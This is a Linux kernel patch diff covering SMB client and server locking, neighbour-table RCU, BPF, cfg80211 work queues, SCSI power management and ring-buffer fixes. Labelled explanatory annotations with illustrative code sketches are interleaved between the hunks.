+ 		if (kobject_init_and_add(&p->kobject, &nfs_netns_client_type,
+ 					parent, "nfs_client") == 0)
+ 			return p;
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+index 57da4f23c1e43..acb8951eb7576 100644
+--- a/fs/smb/client/connect.c
++++ b/fs/smb/client/connect.c
+@@ -2901,9 +2901,9 @@ bind_socket(struct TCP_Server_Info *server)
+ 	if (server->srcaddr.ss_family != AF_UNSPEC) {
+ 		/* Bind to the specified local IP address */
+ 		struct socket *socket = server->ssocket;
+-		rc = socket->ops->bind(socket,
+-				       (struct sockaddr *) &server->srcaddr,
+-				       sizeof(server->srcaddr));
++		rc = kernel_bind(socket,
++				 (struct sockaddr *) &server->srcaddr,
++				 sizeof(server->srcaddr));
+ 		if (rc < 0) {
+ 			struct sockaddr_in *saddr4;
+ 			struct sockaddr_in6 *saddr6;
+@@ -3050,8 +3050,8 @@ generic_ip_connect(struct TCP_Server_Info *server)
+ 		 socket->sk->sk_sndbuf,
+ 		 socket->sk->sk_rcvbuf, socket->sk->sk_rcvtimeo);
+ 
+-	rc = socket->ops->connect(socket, saddr, slen,
+-				  server->noblockcnt ? O_NONBLOCK : 0);
++	rc = kernel_connect(socket, saddr, slen,
++			    server->noblockcnt ? O_NONBLOCK : 0);
+ 	/*
+ 	 * When mounting SMB root file systems, we do not want to block in
+ 	 * connect. Otherwise bail out and then let cifs_reconnect() perform
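
/*
 * Annotation, not part of the patch: kernel_bind()/kernel_connect()
 * are the socket layer's exported wrappers; in v6.1 they are
 * essentially one-liners (hedged paraphrase of net/socket.c, shown for
 * context). Routing cifs through them means any later hardening of the
 * wrappers automatically covers these call sites as well.
 */
int kernel_bind(struct socket *sock, struct sockaddr *addr, int addrlen)
{
	return sock->ops->bind(sock, addr, addrlen);
}

int kernel_connect(struct socket *sock, struct sockaddr *addr, int addrlen,
		   int flags)
{
	return sock->ops->connect(sock, addr, addrlen, flags);
}
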
+diff --git a/fs/smb/server/connection.c b/fs/smb/server/connection.c
+index e1d2be19cddfa..ff97cad8d5b45 100644
+--- a/fs/smb/server/connection.c
++++ b/fs/smb/server/connection.c
+@@ -84,6 +84,8 @@ struct ksmbd_conn *ksmbd_conn_alloc(void)
+ 	spin_lock_init(&conn->llist_lock);
+ 	INIT_LIST_HEAD(&conn->lock_list);
+ 
++	init_rwsem(&conn->session_lock);
++
+ 	down_write(&conn_list_lock);
+ 	list_add(&conn->conns_list, &conn_list);
+ 	up_write(&conn_list_lock);
+diff --git a/fs/smb/server/connection.h b/fs/smb/server/connection.h
+index ad8dfaa48ffb3..335fdd714d595 100644
+--- a/fs/smb/server/connection.h
++++ b/fs/smb/server/connection.h
+@@ -50,6 +50,7 @@ struct ksmbd_conn {
+ 	struct nls_table		*local_nls;
+ 	struct unicode_map		*um;
+ 	struct list_head		conns_list;
++	struct rw_semaphore		session_lock;
+ 	/* smb session 1 per user */
+ 	struct xarray			sessions;
+ 	unsigned long			last_active;
+diff --git a/fs/smb/server/mgmt/user_session.c b/fs/smb/server/mgmt/user_session.c
+index ea4b56d570fbb..cf6621e21ba36 100644
+--- a/fs/smb/server/mgmt/user_session.c
++++ b/fs/smb/server/mgmt/user_session.c
+@@ -183,7 +183,7 @@ static void ksmbd_expire_session(struct ksmbd_conn *conn)
+ 	unsigned long id;
+ 	struct ksmbd_session *sess;
+ 
+-	down_write(&sessions_table_lock);
++	down_write(&conn->session_lock);
+ 	xa_for_each(&conn->sessions, id, sess) {
+ 		if (sess->state != SMB2_SESSION_VALID ||
+ 		    time_after(jiffies,
+@@ -194,7 +194,7 @@ static void ksmbd_expire_session(struct ksmbd_conn *conn)
+ 			continue;
+ 		}
+ 	}
+-	up_write(&sessions_table_lock);
++	up_write(&conn->session_lock);
+ }
+ 
+ int ksmbd_session_register(struct ksmbd_conn *conn,
+@@ -236,7 +236,9 @@ void ksmbd_sessions_deregister(struct ksmbd_conn *conn)
+ 			}
+ 		}
+ 	}
++	up_write(&sessions_table_lock);
+ 
++	down_write(&conn->session_lock);
+ 	xa_for_each(&conn->sessions, id, sess) {
+ 		unsigned long chann_id;
+ 		struct channel *chann;
+@@ -253,7 +255,7 @@ void ksmbd_sessions_deregister(struct ksmbd_conn *conn)
+ 			ksmbd_session_destroy(sess);
+ 		}
+ 	}
+-	up_write(&sessions_table_lock);
++	up_write(&conn->session_lock);
+ }
+ 
+ struct ksmbd_session *ksmbd_session_lookup(struct ksmbd_conn *conn,
+@@ -261,9 +263,11 @@ struct ksmbd_session *ksmbd_session_lookup(struct ksmbd_conn *conn,
+ {
+ 	struct ksmbd_session *sess;
+ 
++	down_read(&conn->session_lock);
+ 	sess = xa_load(&conn->sessions, id);
+ 	if (sess)
+ 		sess->last_active = jiffies;
++	up_read(&conn->session_lock);
+ 	return sess;
+ }
+ 
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index f6fd5cf976a50..683152007566c 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -8128,10 +8128,10 @@ static void smb20_oplock_break_ack(struct ksmbd_work *work)
+ 		goto err_out;
+ 	}
+ 
+-	opinfo_put(opinfo);
+-	ksmbd_fd_put(work, fp);
+ 	opinfo->op_state = OPLOCK_STATE_NONE;
+ 	wake_up_interruptible_all(&opinfo->oplock_q);
++	opinfo_put(opinfo);
++	ksmbd_fd_put(work, fp);
+ 
+ 	rsp->StructureSize = cpu_to_le16(24);
+ 	rsp->OplockLevel = rsp_oplevel;
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index 1ed2ec035e779..1fba826f0acef 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -1065,7 +1065,7 @@ static inline int bpf_trampoline_unlink_prog(struct bpf_tramp_link *link,
+ static inline struct bpf_trampoline *bpf_trampoline_get(u64 key,
+ 							struct bpf_attach_target_info *tgt_info)
+ {
+-	return ERR_PTR(-EOPNOTSUPP);
++	return NULL;
+ }
+ static inline void bpf_trampoline_put(struct bpf_trampoline *tr) {}
+ #define DEFINE_BPF_DISPATCHER(name)
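
/*
 * Annotation, not part of the patch: returning NULL instead of
 * ERR_PTR(-EOPNOTSUPP) matters because callers of bpf_trampoline_get()
 * test the result with !tr rather than IS_ERR(). A hedged,
 * caller-shaped sketch of the pattern the stub now matches (function
 * name illustrative):
 */
static int trampoline_attach_sketch(u64 key,
				    struct bpf_attach_target_info *tgt_info)
{
	struct bpf_trampoline *tr;

	tr = bpf_trampoline_get(key, tgt_info);
	if (!tr)	/* NULL, not IS_ERR(), signals failure */
		return -ENOMEM;
	/* ... attach to tr, then drop the reference ... */
	bpf_trampoline_put(tr);
	return 0;
}
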
+diff --git a/include/linux/ipv6.h b/include/linux/ipv6.h
+index 15d7529ac9534..9a44de45cc1f2 100644
+--- a/include/linux/ipv6.h
++++ b/include/linux/ipv6.h
+@@ -33,6 +33,7 @@ struct ipv6_devconf {
+ 	__s32		accept_ra_defrtr;
+ 	__u32		ra_defrtr_metric;
+ 	__s32		accept_ra_min_hop_limit;
++	__s32		accept_ra_min_lft;
+ 	__s32		accept_ra_pinfo;
+ 	__s32		ignore_routes_with_linkdown;
+ #ifdef CONFIG_IPV6_ROUTER_PREF
+diff --git a/include/linux/mm.h b/include/linux/mm.h
+index 104ec00823da8..eefb0948110ae 100644
+--- a/include/linux/mm.h
++++ b/include/linux/mm.h
+@@ -1906,6 +1906,8 @@ static inline bool can_do_mlock(void) { return false; }
+ extern int user_shm_lock(size_t, struct ucounts *);
+ extern void user_shm_unlock(size_t, struct ucounts *);
+ 
++struct folio *vm_normal_folio(struct vm_area_struct *vma, unsigned long addr,
++			     pte_t pte);
+ struct page *vm_normal_page(struct vm_area_struct *vma, unsigned long addr,
+ 			     pte_t pte);
+ struct page *vm_normal_page_pmd(struct vm_area_struct *vma, unsigned long addr,
+diff --git a/include/linux/netfilter/nf_conntrack_sctp.h b/include/linux/netfilter/nf_conntrack_sctp.h
+index 625f491b95de8..fb31312825ae5 100644
+--- a/include/linux/netfilter/nf_conntrack_sctp.h
++++ b/include/linux/netfilter/nf_conntrack_sctp.h
+@@ -9,6 +9,7 @@ struct ip_ct_sctp {
+ 	enum sctp_conntrack state;
+ 
+ 	__be32 vtag[IP_CT_DIR_MAX];
++	u8 init[IP_CT_DIR_MAX];
+ 	u8 last_dir;
+ 	u8 flags;
+ };
+diff --git a/include/linux/regulator/mt6358-regulator.h b/include/linux/regulator/mt6358-regulator.h
+index bdcf83cd719ef..be9f61e3e8e6d 100644
+--- a/include/linux/regulator/mt6358-regulator.h
++++ b/include/linux/regulator/mt6358-regulator.h
+@@ -48,8 +48,6 @@ enum {
+ 	MT6358_ID_VLDO28,
+ 	MT6358_ID_VAUD28,
+ 	MT6358_ID_VSIM2,
+-	MT6358_ID_VCORE_SSHUB,
+-	MT6358_ID_VSRAM_OTHERS_SSHUB,
+ 	MT6358_ID_RG_MAX,
+ };
+ 
+@@ -90,8 +88,6 @@ enum {
+ 	MT6366_ID_VMC,
+ 	MT6366_ID_VAUD28,
+ 	MT6366_ID_VSIM2,
+-	MT6366_ID_VCORE_SSHUB,
+-	MT6366_ID_VSRAM_OTHERS_SSHUB,
+ 	MT6366_ID_RG_MAX,
+ };
+ 
+diff --git a/include/net/arp.h b/include/net/arp.h
+index d7ef4ec71dfeb..e8747e0713c79 100644
+--- a/include/net/arp.h
++++ b/include/net/arp.h
+@@ -38,11 +38,11 @@ static inline struct neighbour *__ipv4_neigh_lookup(struct net_device *dev, u32
+ {
+ 	struct neighbour *n;
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	n = __ipv4_neigh_lookup_noref(dev, key);
+ 	if (n && !refcount_inc_not_zero(&n->refcnt))
+ 		n = NULL;
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 
+ 	return n;
+ }
+@@ -51,10 +51,10 @@ static inline void __ipv4_confirm_neigh(struct net_device *dev, u32 key)
+ {
+ 	struct neighbour *n;
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	n = __ipv4_neigh_lookup_noref(dev, key);
+ 	neigh_confirm(n);
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ }
+ 
+ void arp_init(void);
+diff --git a/include/net/cfg80211.h b/include/net/cfg80211.h
+index 5976545aa26b9..7a6c3059d50b5 100644
+--- a/include/net/cfg80211.h
++++ b/include/net/cfg80211.h
+@@ -5621,12 +5621,17 @@ struct cfg80211_cqm_config;
+  * wiphy_lock - lock the wiphy
+  * @wiphy: the wiphy to lock
+  *
+- * This is mostly exposed so it can be done around registering and
+- * unregistering netdevs that aren't created through cfg80211 calls,
+- * since that requires locking in cfg80211 when the notifiers is
+- * called, but that cannot differentiate which way it's called.
++ * This is needed around registering and unregistering netdevs that
++ * aren't created through cfg80211 calls, since that requires locking
++ * in cfg80211 when the notifier is called, but that cannot
++ * differentiate which way it's called.
++ *
++ * It can also be used by drivers for their own purposes.
+  *
+  * When cfg80211 ops are called, the wiphy is already locked.
++ *
++ * Note that this makes sure that no workers that have been queued
++ * with wiphy_work_queue() are running.
+  */
+ static inline void wiphy_lock(struct wiphy *wiphy)
+ 	__acquires(&wiphy->mtx)
+@@ -5646,6 +5651,88 @@ static inline void wiphy_unlock(struct wiphy *wiphy)
+ 	mutex_unlock(&wiphy->mtx);
+ }
+ 
++struct wiphy_work;
++typedef void (*wiphy_work_func_t)(struct wiphy *, struct wiphy_work *);
++
++struct wiphy_work {
++	struct list_head entry;
++	wiphy_work_func_t func;
++};
++
++static inline void wiphy_work_init(struct wiphy_work *work,
++				   wiphy_work_func_t func)
++{
++	INIT_LIST_HEAD(&work->entry);
++	work->func = func;
++}
++
++/**
++ * wiphy_work_queue - queue work for the wiphy
++ * @wiphy: the wiphy to queue for
++ * @work: the work item
++ *
++ * This is useful for work that must be done asynchronously, and work
++ * queued here has the special property that the wiphy mutex will be
++ * held as if wiphy_lock() was called, and that it cannot be running
++ * after wiphy_lock() was called. Therefore, wiphy_work_cancel() can
++ * use just cancel_work() instead of cancel_work_sync(), but it
++ * requires being in a section protected by wiphy_lock().
++ */
++void wiphy_work_queue(struct wiphy *wiphy, struct wiphy_work *work);
++
++/**
++ * wiphy_work_cancel - cancel previously queued work
++ * @wiphy: the wiphy, for debug purposes
++ * @work: the work to cancel
++ *
++ * Cancel the work *without* waiting for it, this assumes being
++ * called under the wiphy mutex acquired by wiphy_lock().
++ */
++void wiphy_work_cancel(struct wiphy *wiphy, struct wiphy_work *work);
++
++struct wiphy_delayed_work {
++	struct wiphy_work work;
++	struct wiphy *wiphy;
++	struct timer_list timer;
++};
++
++void wiphy_delayed_work_timer(struct timer_list *t);
++
++static inline void wiphy_delayed_work_init(struct wiphy_delayed_work *dwork,
++					   wiphy_work_func_t func)
++{
++	timer_setup(&dwork->timer, wiphy_delayed_work_timer, 0);
++	wiphy_work_init(&dwork->work, func);
++}
++
++/**
++ * wiphy_delayed_work_queue - queue delayed work for the wiphy
++ * @wiphy: the wiphy to queue for
++ * @dwork: the delayable worker
++ * @delay: number of jiffies to wait before queueing
++ *
++ * This is useful for work that must be done asynchronously, and work
++ * queued here has the special property that the wiphy mutex will be
++ * held as if wiphy_lock() was called, and that it cannot be running
++ * after wiphy_lock() was called. Therefore,
++ * wiphy_delayed_work_cancel() can use just cancel_work() instead of
++ * cancel_work_sync(), but it requires being in a section protected by
++ * wiphy_lock().
++ */
++void wiphy_delayed_work_queue(struct wiphy *wiphy,
++			      struct wiphy_delayed_work *dwork,
++			      unsigned long delay);
++
++/**
++ * wiphy_delayed_work_cancel - cancel previously queued delayed work
++ * @wiphy: the wiphy, for debug purposes
++ * @dwork: the delayed work to cancel
++ *
++ * Cancel the work *without* waiting for it, this assumes being
++ * called under the wiphy mutex acquired by wiphy_lock().
++ */
++void wiphy_delayed_work_cancel(struct wiphy *wiphy,
++			       struct wiphy_delayed_work *dwork);
++
+ /**
+  * struct wireless_dev - wireless device state
+  *
+@@ -5718,6 +5805,7 @@ static inline void wiphy_unlock(struct wiphy *wiphy)
+  * @event_lock: (private) lock for event list
+  * @owner_nlportid: (private) owner socket port ID
+  * @nl_owner_dead: (private) owner socket went away
++ * @cqm_rssi_work: (private) CQM RSSI reporting work
+  * @cqm_config: (private) nl80211 RSSI monitor state
+  * @pmsr_list: (private) peer measurement requests
+  * @pmsr_lock: (private) peer measurements requests/results lock
+@@ -5790,7 +5878,8 @@ struct wireless_dev {
+ 	} wext;
+ #endif
+ 
+-	struct cfg80211_cqm_config *cqm_config;
++	struct wiphy_work cqm_rssi_work;
++	struct cfg80211_cqm_config __rcu *cqm_config;
+ 
+ 	struct list_head pmsr_list;
+ 	spinlock_t pmsr_lock;
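
/*
 * Annotation, not part of the patch: the kernel-doc above fixes the
 * contract of the new work API — queued work runs with the wiphy mutex
 * held and may be cancelled without waiting when inside wiphy_lock().
 * A hedged usage sketch; the driver structure and field names are
 * hypothetical:
 */
struct sketch_priv {
	struct wiphy *wiphy;
	struct wiphy_work scan_done_wk;
};

static void sketch_scan_done(struct wiphy *wiphy, struct wiphy_work *work)
{
	/* runs with wiphy->mtx held, as if wiphy_lock() had been called */
}

static void sketch_init(struct sketch_priv *priv)
{
	wiphy_work_init(&priv->scan_done_wk, sketch_scan_done);
}

static void sketch_event(struct sketch_priv *priv)
{
	wiphy_work_queue(priv->wiphy, &priv->scan_done_wk);
}

static void sketch_stop(struct sketch_priv *priv)
{
	wiphy_lock(priv->wiphy);
	/* no _sync needed: the work cannot run while we hold the mutex */
	wiphy_work_cancel(priv->wiphy, &priv->scan_done_wk);
	wiphy_unlock(priv->wiphy);
}
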
+diff --git a/include/net/ndisc.h b/include/net/ndisc.h
+index da7eec8669ec4..325a6fb65c896 100644
+--- a/include/net/ndisc.h
++++ b/include/net/ndisc.h
+@@ -395,11 +395,11 @@ static inline struct neighbour *__ipv6_neigh_lookup(struct net_device *dev, cons
+ {
+ 	struct neighbour *n;
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	n = __ipv6_neigh_lookup_noref(dev, pkey);
+ 	if (n && !refcount_inc_not_zero(&n->refcnt))
+ 		n = NULL;
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 
+ 	return n;
+ }
+@@ -409,10 +409,10 @@ static inline void __ipv6_confirm_neigh(struct net_device *dev,
+ {
+ 	struct neighbour *n;
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	n = __ipv6_neigh_lookup_noref(dev, pkey);
+ 	neigh_confirm(n);
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ }
+ 
+ static inline void __ipv6_confirm_neigh_stub(struct net_device *dev,
+@@ -420,10 +420,10 @@ static inline void __ipv6_confirm_neigh_stub(struct net_device *dev,
+ {
+ 	struct neighbour *n;
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	n = __ipv6_neigh_lookup_noref_stub(dev, pkey);
+ 	neigh_confirm(n);
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ }
+ 
+ /* uses ipv6_stub and is meant for use outside of IPv6 core */
+diff --git a/include/net/neighbour.h b/include/net/neighbour.h
+index 794e45981891a..ccc4a0f8b4ad8 100644
+--- a/include/net/neighbour.h
++++ b/include/net/neighbour.h
+@@ -299,14 +299,14 @@ static inline struct neighbour *___neigh_lookup_noref(
+ 	const void *pkey,
+ 	struct net_device *dev)
+ {
+-	struct neigh_hash_table *nht = rcu_dereference_bh(tbl->nht);
++	struct neigh_hash_table *nht = rcu_dereference(tbl->nht);
+ 	struct neighbour *n;
+ 	u32 hash_val;
+ 
+ 	hash_val = hash(pkey, dev, nht->hash_rnd) >> (32 - nht->hash_shift);
+-	for (n = rcu_dereference_bh(nht->hash_buckets[hash_val]);
++	for (n = rcu_dereference(nht->hash_buckets[hash_val]);
+ 	     n != NULL;
+-	     n = rcu_dereference_bh(n->next)) {
++	     n = rcu_dereference(n->next)) {
+ 		if (n->dev == dev && key_eq(n, pkey))
+ 			return n;
+ 	}
+@@ -464,7 +464,7 @@ static __always_inline int neigh_event_send_probe(struct neighbour *neigh,
+ 
+ 	if (READ_ONCE(neigh->used) != now)
+ 		WRITE_ONCE(neigh->used, now);
+-	if (!(neigh->nud_state & (NUD_CONNECTED | NUD_DELAY | NUD_PROBE)))
++	if (!(READ_ONCE(neigh->nud_state) & (NUD_CONNECTED | NUD_DELAY | NUD_PROBE)))
+ 		return __neigh_event_send(neigh, skb, immediate_ok);
+ 	return 0;
+ }
+@@ -541,7 +541,7 @@ static inline int neigh_output(struct neighbour *n, struct sk_buff *skb,
+ 	    READ_ONCE(hh->hh_len))
+ 		return neigh_hh_output(hh, skb);
+ 
+-	return n->output(n, skb);
++	return READ_ONCE(n->output)(n, skb);
+ }
+ 
+ static inline struct neighbour *
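
/*
 * Annotation, not part of the patch: READ_ONCE(n->output) in
 * neigh_output() is only half of the data-race fix; it pairs with
 * WRITE_ONCE() on the writer side in net/core/neighbour.c (outside
 * this excerpt). A hedged sketch of that pairing, modelled on the
 * neigh_connect()-style updaters:
 */
static void neigh_connect_sketch(struct neighbour *neigh)
{
	/* pairs with READ_ONCE(n->output) in neigh_output() above */
	WRITE_ONCE(neigh->output, neigh->ops->connected_output);
}
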
+diff --git a/include/net/netlink.h b/include/net/netlink.h
+index 6bfa972f2fbf2..a686c9041ddc0 100644
+--- a/include/net/netlink.h
++++ b/include/net/netlink.h
+@@ -937,6 +937,27 @@ static inline struct nlmsghdr *nlmsg_put(struct sk_buff *skb, u32 portid, u32 se
+ 	return __nlmsg_put(skb, portid, seq, type, payload, flags);
+ }
+ 
++/**
++ * nlmsg_append - Add more data to a nlmsg in a skb
++ * @skb: socket buffer to store message in
++ * @size: length of message payload
++ *
++ * Append data to an existing nlmsg, used when constructing a message
++ * with multiple fixed-format headers (which is rare).
++ * Returns NULL if the tailroom of the skb is insufficient to store
++ * the extra payload.
++ */
++static inline void *nlmsg_append(struct sk_buff *skb, u32 size)
++{
++	if (unlikely(skb_tailroom(skb) < NLMSG_ALIGN(size)))
++		return NULL;
++
++	if (NLMSG_ALIGN(size) - size)
++		memset(skb_tail_pointer(skb) + size, 0,
++		       NLMSG_ALIGN(size) - size);
++	return __skb_put(skb, NLMSG_ALIGN(size));
++}
++
+ /**
+  * nlmsg_put_answer - Add a new callback based netlink message to an skb
+  * @skb: socket buffer to store message in
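
/*
 * Annotation, not part of the patch: a hedged usage sketch for the
 * nlmsg_append() helper added above — start a message with nlmsg_put(),
 * then tack on a second fixed-format header. The header types here are
 * purely illustrative.
 */
static int nlmsg_append_sketch(struct sk_buff *skb, u32 portid, u32 seq)
{
	struct nlmsghdr *nlh;
	struct ifinfomsg *ifm;
	struct rtnexthop *rtnh;

	nlh = nlmsg_put(skb, portid, seq, RTM_NEWLINK, sizeof(*ifm), 0);
	if (!nlh)
		return -EMSGSIZE;
	ifm = nlmsg_data(nlh);
	memset(ifm, 0, sizeof(*ifm));

	rtnh = nlmsg_append(skb, sizeof(*rtnh));	/* second header */
	if (!rtnh)
		return -EMSGSIZE;
	memset(rtnh, 0, sizeof(*rtnh));

	nlmsg_end(skb, nlh);
	return 0;
}
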
+diff --git a/include/net/nexthop.h b/include/net/nexthop.h
+index 28085b995ddcf..2b12725de9c09 100644
+--- a/include/net/nexthop.h
++++ b/include/net/nexthop.h
+@@ -497,29 +497,6 @@ static inline struct fib6_nh *nexthop_fib6_nh(struct nexthop *nh)
+ 	return NULL;
+ }
+ 
+-/* Variant of nexthop_fib6_nh().
+- * Caller should either hold rcu_read_lock_bh(), or RTNL.
+- */
+-static inline struct fib6_nh *nexthop_fib6_nh_bh(struct nexthop *nh)
+-{
+-	struct nh_info *nhi;
+-
+-	if (nh->is_group) {
+-		struct nh_group *nh_grp;
+-
+-		nh_grp = rcu_dereference_bh_rtnl(nh->nh_grp);
+-		nh = nexthop_mpath_select(nh_grp, 0);
+-		if (!nh)
+-			return NULL;
+-	}
+-
+-	nhi = rcu_dereference_bh_rtnl(nh->nh_info);
+-	if (nhi->family == AF_INET6)
+-		return &nhi->fib6_nh;
+-
+-	return NULL;
+-}
+-
+ static inline struct net_device *fib6_info_nh_dev(struct fib6_info *f6i)
+ {
+ 	struct fib6_nh *fib6_nh;
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index 5fd69f2342a44..9ebb54122bb71 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -355,12 +355,14 @@ ssize_t tcp_splice_read(struct socket *sk, loff_t *ppos,
+ struct sk_buff *tcp_stream_alloc_skb(struct sock *sk, int size, gfp_t gfp,
+ 				     bool force_schedule);
+ 
+-static inline void tcp_dec_quickack_mode(struct sock *sk,
+-					 const unsigned int pkts)
++static inline void tcp_dec_quickack_mode(struct sock *sk)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
+ 
+ 	if (icsk->icsk_ack.quick) {
++		/* How many ACKs S/ACKing new data have we sent? */
++		const unsigned int pkts = inet_csk_ack_scheduled(sk) ? 1 : 0;
++
+ 		if (pkts >= icsk->icsk_ack.quick) {
+ 			icsk->icsk_ack.quick = 0;
+ 			/* Leaving quickack mode we deflate ATO. */
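
/*
 * Annotation, not part of the patch: with the "how many ACKs" count
 * now derived from inet_csk_ack_scheduled() inside the helper, the
 * caller in tcp_output.c (outside this excerpt) no longer passes a
 * packet count. A hedged sketch of the simplified call site:
 */
static void tcp_event_ack_sent_sketch(struct sock *sk)
{
	tcp_dec_quickack_mode(sk);
	inet_csk_clear_xmit_timer(sk, ICSK_TIME_DACK);
}
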
+diff --git a/include/scsi/scsi_device.h b/include/scsi/scsi_device.h
+index 006858ed04e8c..dc2cff18b68bd 100644
+--- a/include/scsi/scsi_device.h
++++ b/include/scsi/scsi_device.h
+@@ -161,6 +161,10 @@ struct scsi_device {
+ 				 * pass settings from slave_alloc to scsi
+ 				 * core. */
+ 	unsigned int eh_timeout; /* Error handling timeout */
++
++	bool manage_system_start_stop; /* Let HLD (sd) manage system start/stop */
++	bool manage_runtime_start_stop; /* Let HLD (sd) manage runtime start/stop */
++
+ 	unsigned removable:1;
+ 	unsigned changed:1;	/* Data invalid due to media change */
+ 	unsigned busy:1;	/* Used to prevent races */
+@@ -192,7 +196,7 @@ struct scsi_device {
+ 	unsigned use_192_bytes_for_3f:1; /* ask for 192 bytes from page 0x3f */
+ 	unsigned no_start_on_add:1;	/* do not issue start on add */
+ 	unsigned allow_restart:1; /* issue START_UNIT in error handler */
+-	unsigned manage_start_stop:1;	/* Let HLD (sd) manage start/stop */
++	unsigned no_start_on_resume:1; /* Do not issue START_STOP_UNIT on resume */
+ 	unsigned start_stop_pwr_cond:1;	/* Set power cond. in START_STOP_UNIT */
+ 	unsigned no_uld_attach:1; /* disable connecting to upper level drivers */
+ 	unsigned select_no_atn:1;
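
/*
 * Annotation, not part of the patch: splitting the old
 * manage_start_stop bit into system and runtime variants lets a LLD
 * opt into sd-managed START/STOP per PM context. A hedged sketch of a
 * driver-side opt-in (illustrative callback; the old code would have
 * set the single manage_start_stop bit):
 */
static int sketch_slave_configure(struct scsi_device *sdev)
{
	/* let sd issue START/STOP across system suspend/resume ... */
	sdev->manage_system_start_stop = true;
	/* ... and for runtime PM transitions as well */
	sdev->manage_runtime_start_stop = true;
	return 0;
}
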
+diff --git a/include/scsi/scsi_host.h b/include/scsi/scsi_host.h
+index d27d9fb7174c8..71def41b1ad78 100644
+--- a/include/scsi/scsi_host.h
++++ b/include/scsi/scsi_host.h
+@@ -752,7 +752,7 @@ extern int __must_check scsi_add_host_with_dma(struct Scsi_Host *,
+ 					       struct device *,
+ 					       struct device *);
+ extern void scsi_scan_host(struct Scsi_Host *);
+-extern void scsi_rescan_device(struct device *);
++extern int scsi_rescan_device(struct scsi_device *sdev);
+ extern void scsi_remove_host(struct Scsi_Host *);
+ extern struct Scsi_Host *scsi_host_get(struct Scsi_Host *);
+ extern int scsi_host_busy(struct Scsi_Host *shost);
+diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h
+index 53bc487947197..92dbe89dafbf5 100644
+--- a/include/uapi/linux/bpf.h
++++ b/include/uapi/linux/bpf.h
+@@ -3112,6 +3112,11 @@ union bpf_attr {
+  *		**BPF_FIB_LOOKUP_OUTPUT**
+  *			Perform lookup from an egress perspective (default is
+  *			ingress).
++ *		**BPF_FIB_LOOKUP_SKIP_NEIGH**
++ *			Skip the neighbour table lookup. *params*->dmac
++ *			and *params*->smac will not be set as output. A common
++ *			use case is to call **bpf_redirect_neigh**\ () after
++ *			doing **bpf_fib_lookup**\ ().
+  *
+  *		*ctx* is either **struct xdp_md** for XDP programs or
+  *		**struct sk_buff** tc cls_act programs.
+@@ -6678,6 +6683,7 @@ struct bpf_raw_tracepoint_args {
+ enum {
+ 	BPF_FIB_LOOKUP_DIRECT  = (1U << 0),
+ 	BPF_FIB_LOOKUP_OUTPUT  = (1U << 1),
++	BPF_FIB_LOOKUP_SKIP_NEIGH = (1U << 2),
+ };
+ 
+ enum {
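
/*
 * Annotation, not part of the patch: the helper doc above names the
 * intended pattern for the new flag — skip the neighbour lookup in
 * bpf_fib_lookup() and let bpf_redirect_neigh() resolve L2 instead. A
 * hedged tc-BPF sketch (libbpf conventions; header parsing and address
 * setup are elided to the minimum):
 */
SEC("tc")
int fib_skip_neigh_sketch(struct __sk_buff *skb)
{
	struct bpf_fib_lookup params = {};
	long rc;

	params.family  = AF_INET;
	params.ifindex = skb->ingress_ifindex;
	/* assume saddr/daddr were filled in from the parsed IP header */

	rc = bpf_fib_lookup(skb, &params, sizeof(params),
			    BPF_FIB_LOOKUP_SKIP_NEIGH);
	if (rc != BPF_FIB_LKUP_RET_SUCCESS)
		return TC_ACT_OK;

	/* dmac/smac were left unset; the neigh subsystem resolves them */
	return bpf_redirect_neigh(params.ifindex, NULL, 0, 0);
}
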
+diff --git a/include/uapi/linux/ipv6.h b/include/uapi/linux/ipv6.h
+index 53326dfc59ecb..4fa8511b1e355 100644
+--- a/include/uapi/linux/ipv6.h
++++ b/include/uapi/linux/ipv6.h
+@@ -198,6 +198,7 @@ enum {
+ 	DEVCONF_IOAM6_ID_WIDE,
+ 	DEVCONF_NDISC_EVICT_NOCARRIER,
+ 	DEVCONF_ACCEPT_UNTRACKED_NA,
++	DEVCONF_ACCEPT_RA_MIN_LFT,
+ 	DEVCONF_MAX
+ };
+ 
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 2f562cf961e0a..b7383358c4ea1 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -354,10 +354,11 @@ static void rb_init_page(struct buffer_data_page *bpage)
+ 	local_set(&bpage->commit, 0);
+ }
+ 
+-/*
+- * Also stolen from mm/slob.c. Thanks to Mathieu Desnoyers for pointing
+- * this issue out.
+- */
++static __always_inline unsigned int rb_page_commit(struct buffer_page *bpage)
++{
++	return local_read(&bpage->page->commit);
++}
++
+ static void free_buffer_page(struct buffer_page *bpage)
+ {
+ 	free_page((unsigned long)bpage->page);
+@@ -2024,7 +2025,7 @@ rb_remove_pages(struct ring_buffer_per_cpu *cpu_buffer, unsigned long nr_pages)
+ 			 * Increment overrun to account for the lost events.
+ 			 */
+ 			local_add(page_entries, &cpu_buffer->overrun);
+-			local_sub(BUF_PAGE_SIZE, &cpu_buffer->entries_bytes);
++			local_sub(rb_page_commit(to_remove_page), &cpu_buffer->entries_bytes);
+ 			local_inc(&cpu_buffer->pages_lost);
+ 		}
+ 
+@@ -2368,11 +2369,6 @@ rb_reader_event(struct ring_buffer_per_cpu *cpu_buffer)
+ 			       cpu_buffer->reader_page->read);
+ }
+ 
+-static __always_inline unsigned rb_page_commit(struct buffer_page *bpage)
+-{
